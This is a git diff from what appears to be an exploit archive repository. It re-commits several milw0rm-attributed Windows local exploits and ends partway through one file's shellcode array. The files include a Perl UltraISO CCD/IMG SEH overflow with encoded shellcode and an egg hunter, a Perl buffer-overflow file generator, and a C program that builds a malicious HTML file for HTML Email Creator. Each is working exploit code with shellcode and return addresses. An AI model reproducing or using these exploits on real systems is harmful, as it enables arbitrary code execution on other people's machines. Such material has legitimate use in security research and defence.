"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\xB3\x61\xEB\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\xF7\x22\xF5\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6C\xC8\xA3\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x11\xF4\x3F\x3F". + "\x3F\x3F\x3F\x3F\x3F\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x48\x7B\xC2\xCB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xF7\x9A\xBE\xBB\x20\x31\x69\x10\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x1B\xCB\xCB\x52\x52\xA4\xA4\xC5\x2D". + "\xA6\xAC\x45\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x71\x39\x28\x8E\x32". + "\x21\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x65\x65\x8A\x8A\x52\x52\xA4\xA4\x99\xA6\xF6\xEE\x76\x12"; +my $ccd_data = "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F". + "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63". + "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B". + "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70". + "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F". + "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34". + "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72". + "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31". 
+ "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B". + "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D". + "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F". + "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C". + "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D". + "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D". + "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31". + "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D". + "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A". + "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33". + "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31". + "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D". + "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D". + "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D". 
+ "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".
+ "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";
+
+# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
+"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x68".
+"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x78\x32\x42\x42\x32\x41".
+"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6d\x39\x6b\x4c\x6a".
+"\x48\x31\x54\x53\x30\x55\x50\x77\x70\x4c\x4b\x30\x45\x45\x6c\x4e".
+"\x6b\x71\x6c\x46\x65\x32\x58\x43\x31\x38\x6f\x4c\x4b\x62\x6f\x56".
+"\x78\x6c\x4b\x41\x4f\x41\x30\x45\x51\x7a\x4b\x37\x39\x6e\x6b\x74".
+"\x74\x4c\x4b\x34\x41\x38\x6e\x30\x31\x39\x50\x4f\x69\x6e\x4c\x4b".
+"\x34\x6b\x70\x53\x44\x66\x67\x4b\x71\x58\x4a\x34\x4d\x54\x41\x39".
+"\x52\x38\x6b\x6c\x34\x57\x4b\x32\x74\x41\x34\x34\x44\x74\x35\x7a".
+"\x45\x4c\x4b\x41\x4f\x41\x34\x44\x41\x6a\x4b\x61\x76\x4e\x6b\x36".
+"\x6c\x70\x4b\x4c\x4b\x43\x6f\x57\x6c\x63\x31\x58\x6b\x6e\x6b\x37".
+"\x6c\x6e\x6b\x66\x61\x38\x6b\x4c\x49\x31\x4c\x66\x44\x76\x64\x4b".
+"\x73\x47\x41\x59\x50\x50\x64\x4e\x6b\x77\x30\x30\x30\x4c\x45\x4b".
+"\x70\x70\x78\x44\x4c\x6c\x4b\x73\x70\x56\x6c\x6e\x6b\x72\x50\x47".
+"\x6c\x4c\x6d\x4c\x4b\x62\x48\x43\x38\x5a\x4b\x74\x49\x4c\x4b\x4f".
+"\x70\x6e\x50\x47\x70\x37\x70\x75\x50\x6e\x6b\x41\x78\x45\x6c\x31".
+"\x4f\x37\x41\x4c\x36\x61\x70\x36\x36\x4e\x69\x7a\x58\x4b\x33\x6b".
+"\x70\x63\x4b\x56\x30\x61\x78\x31\x6e\x4e\x38\x6d\x32\x72\x53\x55".
+"\x38\x4d\x48\x6b\x4e\x4e\x6a\x76\x6e\x32\x77\x59\x6f\x69\x77\x50".
+"\x63\x50\x61\x30\x6c\x65\x33\x56\x4e\x63\x55\x32\x58\x32\x45\x35".
+"\x50\x68";
+
+
+my $overflow1 = "\x41" x 10002;
+my $lookout = "\x41" x 128;
+my $sehjmp = "\xEB\x80\xFF\xFF";
+my $sehret = "\x56\x38\x40\x00"; # 00403856 POP POP RETN
+my $shellhunter = "\x8b\xcc".
+ "\xb8\x41\x41\x41\x41".
+ "\x41".
+ "\x36\x39\x01".
+ "\x75\xf5".
+ "\xff\xd1";
+my $len1 = 4091 - (length($shellcode) + 128 + 126) + 972; #Remove "+ 972" if you want the exploit to work if the CCD or IMG file are executed when passed as parameters to UltraISO.
+my $len2 = 126 - length($shellhunter);
+my $overflow2 = "\x42" x $len1;
+my $overflow3 = "\x41" x $len2;
+my $overflow4 = "\x43" x 5903;
+
+open (my $img_file, "> s.img"); #Important: IMG filename must be same as CCD filename.
+binmode $img_file;
+print $img_file $img_data1.
+ $overflow1.
+ $img_data2.
+ $overflow1.
+ $img_data3.
+ $overflow1.
+ $img_data4;
+close $img_file;
+open (my $ccd_file, "> s.ccd");
+print $ccd_file $ccd_data.
+ $lookout.$shellcode.$overflow2.$shellhunter.$overflow3.$sehjmp.$sehret.$overflow4;
+close $ccd_file;
+
+# milw0rm.com [2009-04-03]
diff --git a/platforms/windows/local/835.c b/platforms/windows/local/835.c
index a75fa8114..c459afb33 100755
--- a/platforms/windows/local/835.c
+++ b/platforms/windows/local/835.c
@@ -174,6 +174,6 @@ prgfiles, &dwBufLen); return 0;
-}
-
-// milw0rm.com [2005-02-22]
+}
+
+// milw0rm.com [2005-02-22]
diff --git a/platforms/windows/local/836.c b/platforms/windows/local/836.c
index 0499b162d..2110e1ad6 100755
--- a/platforms/windows/local/836.c
+++ b/platforms/windows/local/836.c
@@ -179,6 +179,6 @@ int main(void) return 0;
-}
-
-// milw0rm.com [2005-02-23]
+}
+
+// milw0rm.com [2005-02-23]
diff --git a/platforms/windows/local/837.c b/platforms/windows/local/837.c
index 464c743ff..1812c08eb 100755
--- a/platforms/windows/local/837.c
+++ b/platforms/windows/local/837.c
@@ -146,6 +146,6 @@ int main() return 0;
-}
-
-// milw0rm.com [2005-02-23]
+}
+
+// milw0rm.com [2005-02-23]
diff --git a/platforms/windows/local/8371.pl b/platforms/windows/local/8371.pl
index 4cafda3d8..0434a835a 100755
--- a/platforms/windows/local/8371.pl
+++ b/platforms/windows/local/8371.pl
@@ -1,28 +1,28 @@
-#!/usr/bin/perl
-# By AlpHaNiX [NullArea.Net]
-# alpha[at]hacker.bz
-# Made in Tunisia
-
-my $junk = "\x41" x 96 ; # whatever bytes
-my $nop = "\x90" x 20 ; # bla bla xD
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
-my $shellcode =
- "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
- "\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
- "\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
- "\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
- "\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
- "\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
- "\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
- "\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
- "\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
- "\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
- "\xac\x2c\xc9\x40" ;
-my $ret = "\x58\xF6\xE8\x73"; # pop ebx pop ret
-my $exploit = $junk.$nop.$shellcode.$ret;
-open (file,">>file.ofl");
-print file $exploit;
-close (file);
-print "done\n";
-
-# milw0rm.com [2009-04-08]
+#!/usr/bin/perl
+# By AlpHaNiX [NullArea.Net]
+# alpha[at]hacker.bz
+# Made in Tunisia
+
+my $junk = "\x41" x 96 ; # whatever bytes
+my $nop = "\x90" x 20 ; # bla bla xD
+# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
+my $shellcode =
+ "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
+ "\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
+ "\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
+ "\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
+ "\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
+ "\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
+ "\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
+ "\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
+ "\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
+ "\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
+ "\xac\x2c\xc9\x40" ;
+my $ret = "\x58\xF6\xE8\x73"; # pop ebx pop ret
+my $exploit = $junk.$nop.$shellcode.$ret;
+open (file,">>file.ofl");
+print file $exploit;
+close (file);
+print "done\n";
+
+# milw0rm.com [2009-04-08]
diff --git a/platforms/windows/local/839.cpp b/platforms/windows/local/839.cpp
index a40f8e49a..c8a58fe56 100755
--- a/platforms/windows/local/839.cpp
+++ b/platforms/windows/local/839.cpp
@@ -74,6 +74,6 @@ void main() } }
-}
-
-// milw0rm.com [2005-02-24]
+}
+
+// milw0rm.com [2005-02-24]
diff --git a/platforms/windows/local/8401.cpp b/platforms/windows/local/8401.cpp
index 491419f78..5f5e7132c 100755
--- a/platforms/windows/local/8401.cpp
+++ b/platforms/windows/local/8401.cpp
@@ -1,109 +1,109 @@
-/*
- :::::::-. ... ::::::. :::.
- ;;, `';, ;; ;;;`;;;;, `;;;
- `[[ [[[[' [[[ [[[[[. '[[
- $$, $$$$ $$$ $$$ "Y$c$$
- 888_,o8P'88 .d888 888 Y88
- MMMMP"` "YmmMMMM"" MMM YM
- [ Discovered and Exploited by dun ]
-
-
- [ HTML Email Creator <= 2.1 build 668 ] (html) Local SEH Overwrite Exploit
-
- Vendor: http://www.html-email.net/
- Download: http://www.html-email.net/download/html2emailcreator.exe
-
- Vuln:
- <img src="520 x A">
- or
- <script src="520 x A">
- or
- <link href="520 x A">
-
- ___________________________520_____________________________
- | |
- [ NOPs ][ jmp 11 ][ pop-pop-ret ][ NOPs ][ shellcode ][ NOPs ]
- 56 4 4 40 343 73
-
-
- Greetz: suN8Hclf, str0ke
-
- [ dun'at'strcpy.pl / 2009 ]
-*/
-
-
-#include <windows.h>
-#include <stdio.h>
-
-/*
-Tested on:
-WIN XP SP2 with installed "PC TOOLS Spyware Doctor" from google pack
-/SafeSEH OFF 0x636e0000 0x63709000 6.1.0.2 C:\Program Files\Spyware Doctor\smum32.dll
-#define RET 0x636E34BC // pop-pop-ret
-
-WIN XP without any upgrades
-kernel32.dll 0x77E9CB0E pop EAX - pop - ret
-#define RET 0x77E9CB0E // pop-pop-ret
-*/
-
-
-#define RET 0x77E9CB0E // pop-pop-ret
-#define JMP 0x909011EB // short jump (jmp 11)
-#define LEN 520
-#define NOP 0x90
-
-
-// win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-char scode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
-"\x4e\x56\x43\x46\x42\x30\x5a";
-
-
-
-int main() {
-
-FILE *file;
-int i=0;
-char buf[LEN+1];
-char *ptr=buf;
-
-memset(buf,0x00,LEN+1);
-memset(buf,NOP,LEN);
-*(unsigned long *)&buf[56] = JMP;
-*(unsigned long *)&buf[60] = RET;
-ptr+=56+4+4+40;
-memcpy(ptr, scode, strlen(scode));
-
-file=fopen("pwn.html","w");
-
-fprintf(file, "<HTML>\n<HEAD></HEAD>\n<BODY>\n<img src=\"");
-fputs(buf,file);
-fprintf(file, "\">\n</BODY>\n</HTML>\n");
-fclose(file);
-
-
-printf("File created..\n");
- return 0;
-}
-
-// milw0rm.com [2009-04-13]
+/*
+ :::::::-. ... ::::::. :::.
+ ;;, `';, ;; ;;;`;;;;, `;;;
+ `[[ [[[[' [[[ [[[[[. '[[
+ $$, $$$$ $$$ $$$ "Y$c$$
+ 888_,o8P'88 .d888 888 Y88
+ MMMMP"` "YmmMMMM"" MMM YM
+ [ Discovered and Exploited by dun ]
+
+
+ [ HTML Email Creator <= 2.1 build 668 ] (html) Local SEH Overwrite Exploit
+
+ Vendor: http://www.html-email.net/
+ Download: http://www.html-email.net/download/html2emailcreator.exe
+
+ Vuln:
+ <img src="520 x A">
+ or
+ <script src="520 x A">
+ or
+ <link href="520 x A">
+
+ ___________________________520_____________________________
+ | |
+ [ NOPs ][ jmp 11 ][ pop-pop-ret ][ NOPs ][ shellcode ][ NOPs ]
+ 56 4 4 40 343 73
+
+
+ Greetz: suN8Hclf, str0ke
+
+ [ dun'at'strcpy.pl / 2009 ]
+*/
+
+
+#include <windows.h>
+#include <stdio.h>
+
+/*
+Tested on:
+WIN XP SP2 with installed "PC TOOLS Spyware Doctor" from google pack
+/SafeSEH OFF 0x636e0000 0x63709000 6.1.0.2 C:\Program Files\Spyware Doctor\smum32.dll
+#define RET 0x636E34BC // pop-pop-ret
+
+WIN XP without any upgrades
+kernel32.dll 0x77E9CB0E pop EAX - pop - ret
+#define RET 0x77E9CB0E // pop-pop-ret
+*/
+
+
+#define RET 0x77E9CB0E // pop-pop-ret
+#define JMP 0x909011EB // short jump (jmp 11)
+#define LEN 520
+#define NOP 0x90
+
+
+// win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+char scode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
